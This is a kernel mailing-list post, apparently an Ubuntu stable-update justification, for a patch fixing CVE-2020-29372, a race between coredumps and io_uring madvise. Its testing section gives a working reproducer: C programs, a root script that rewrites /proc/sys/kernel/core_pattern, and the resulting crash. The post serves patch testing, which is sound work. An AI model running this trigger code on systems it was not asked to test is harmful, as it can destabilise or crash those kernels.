[SRU][CVE-2020-29372][F/B/X][PATCH 0/1] mm: check that mm is still valid in madvise()
William Breathitt Gray
william.gray at canonical.com
Fri Jan 8 08:41:24 UTC 2021
SRU Justification
=================
[Impact]
An issue was discovered in do_madvise in mm/madvise.c in the Linux
kernel before 5.6.8. There is a race condition between coredump
operations and the IORING_OP_MADVISE implementation, aka
CID-bc0c4d1e176e.
[Testing]
Jann Horn from Google Security Research has provided a root-only KASAN
reproducer:
<https://packetstormsecurity.com/files/157622/Linux-5.6-IORING_OP_MADVISE-Race-Condition.html>.
You should also be able to hit the bug as a normal user, especially if
you use FUSE:
$ cat > coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>
int main(void) {
char buf[1024];
size_t total = 0;
bool slept = false;
while (1) {
int res = read(0, buf, sizeof(buf));
if (res == -1) err(1, \"read\");
if (res == 0) return 0;
total += res;
if (total > 1024*1024 && !slept) {
sleep(2);
slept = true;
}
}
}
$ gcc -o coredump_helper coredump_helper.c
$ cat > set_helper.sh
#!/bin/sh
echo \"|$(realpath ./coredump_helper)\" > /proc/sys/kernel/core_pattern
$ sudo ./set_helper.sh
$ cat > dumpme.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/io_uring.h>
#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})
int main(void) {
void *area = SYSCHK(mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
memset(area, 'O', 1024*1024*2);
SYSCHK(madvise(area+0x1000, 256*0x1000, MADV_RANDOM));
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/10, ¶ms));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
MAP_SHARED, uring_fd,
IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
MAP_SHARED, uring_fd,
IORING_OFF_CQ_RING));
struct io_uring_sqe *sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
MAP_SHARED, uring_fd,
IORING_OFF_SQES));
// prepare delayed madvise via uring
struct timespec ts = { .tv_sec = 1 };
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_TIMEOUT,
.flags = IOSQE_IO_HARDLINK,
.len = 1,
.addr = (unsigned long)&ts
};
sqes[1] = (struct io_uring_sqe) {
// no ioprio, buf_index, off
.opcode = IORING_OP_MADVISE,
.addr = (unsigned long)area+1024*4/**1024*/,
.len = 1024*1024,
.fadvise_advice = MADV_NORMAL
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
((int*)(sq_ring + params.sq_off.array))[1] = 1;
(*(int*)(sq_ring + params.sq_off.tail)) += 2;
int submitted = SYSCHK(syscall(__NR_io_uring_enter, uring_fd,
/*to_submit=*/2, /*min_complete=*/0,
/*flags=*/0, /*sig=*/NULL, /*sigsz=*/0));
printf(\"submitted %d\
\", submitted);
*(volatile char *)0 = 42;
}
$ gcc -o dumpme dumpme.c
$ ./dumpme
submitted 2
Segmentation fault (core dumped)
$
[Regression Potential]
Regression potentional is low. Changes affect only the do_madvise()
function, and consist of a simple mitigation: verifying that the mm is
still okay via mmget_still_valid().
[Miscellaneous]
Fix is already present in Groovy and Hirsute.
Linus Torvalds (1):
mm: check that mm is still valid in madvise()
mm/madvise.c | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
--
2.27.0
More information about the kernel-team
mailing list